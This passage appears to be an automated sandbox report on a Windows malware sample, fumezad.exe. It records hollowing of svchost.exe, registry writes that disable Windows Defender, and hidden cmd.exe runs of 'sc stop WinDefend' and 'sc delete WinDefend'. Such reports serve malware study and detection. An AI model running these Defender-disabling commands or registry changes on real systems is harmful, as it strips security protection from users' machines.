| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x138 | address = 0x400000, size = 176128 |
|
1 | |
| Modify Memory | #15: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x138 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Control Flow | #15: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0x138 | os_tid = 0x854, address = 0x777d01c4 |
|
1 |
Host Behavior
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | - |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (6)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x874, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x894, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x318, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\svchost.exe | os_pid = 0x714, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Get Info | C:\Windows\system32\svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
2 |
Thread (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Resume | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | os_tid = 0x854 |
|
1 |
Memory (43)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a7b8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615720 |
|
2 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a6f0, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615624 |
|
1 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a700, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1615752 |
|
1 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a6c0, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1615768 |
|
4 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a620, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615400 |
|
1 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a578, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615144 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0xffaa246c, protection = PAGE_EXECUTE_READWRITE, size = 1615800 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x10000000, protection = PAGE_READONLY, size = 1615712 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x10001000, protection = PAGE_EXECUTE_READ, size = 1615744 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x1001b000, protection = PAGE_READWRITE, size = 1615744 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x1001e000, protection = PAGE_READONLY, size = 1615744 |
|
1 | |
| Protect | C:\Windows\system32\svchost.exe | address = 0x1001f000, protection = PAGE_READONLY, size = 1615744 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x7fffffde000, size = 712 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0xffaa0000, size = 64 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0xffaa00e8, size = 264 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x7fffffde018, size = 8 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x77712640, size = 48 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x4126d0, size = 136 |
|
1 | |
| Read | C:\Windows\system32\svchost.exe | address = 0x60000, size = 72 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x50000, size = 544 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x60000, size = 72 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0xffaa246c, size = 22 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x10000000, size = 1024 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x10001000, size = 104448 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x1001b000, size = 9216 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x1001e000, size = 512 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x1001f000, size = 512 |
|
2 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x7fffffde010, size = 8 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x412700, size = 8 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x20000, size = 16 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x20010, size = 110 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0x412718, size = 16 |
|
1 | |
| Write | C:\Windows\system32\svchost.exe | address = 0xe0000, size = 16 |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | advapi32.dll | base_address = 0x0 |
|
1 | |
| Load | ole32.dll | base_address = 0x0 |
|
1 | |
| Load | WTSAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | shell32.dll | base_address = 0x0 |
|
1 | |
| Load | kernel32.dll | base_address = 0xc0000018 |
|
1 | |
| Load | kernelbase.dll | base_address = 0x0 |
|
1 | |
| Get Filename | shell32.dll | process_name = c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 260 |
|
1 |
Service (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | service_name = WinDefend |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
3 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Hardware Information |
|
1 |
Process #17: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:09, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x874 |
| Parent PID | 0x844 (c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
884
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x00296fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00837fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x01dcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001dd0000 | 0x01dd0000 | 0x02112fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02120000 | 0x023eefff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a550000 | 0x4a59bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xb74, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a550000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7656a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76573b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76554a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7656a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 183004 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #18: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:10, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x894 |
| Parent PID | 0x844 (c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
898
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00757fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00910fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x01d1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x02062fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02070000 | 0x0233efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a550000 | 0x4a59bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xac4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a550000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7656a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76573b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76554a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7656a79d |
|
1 |
System (2)
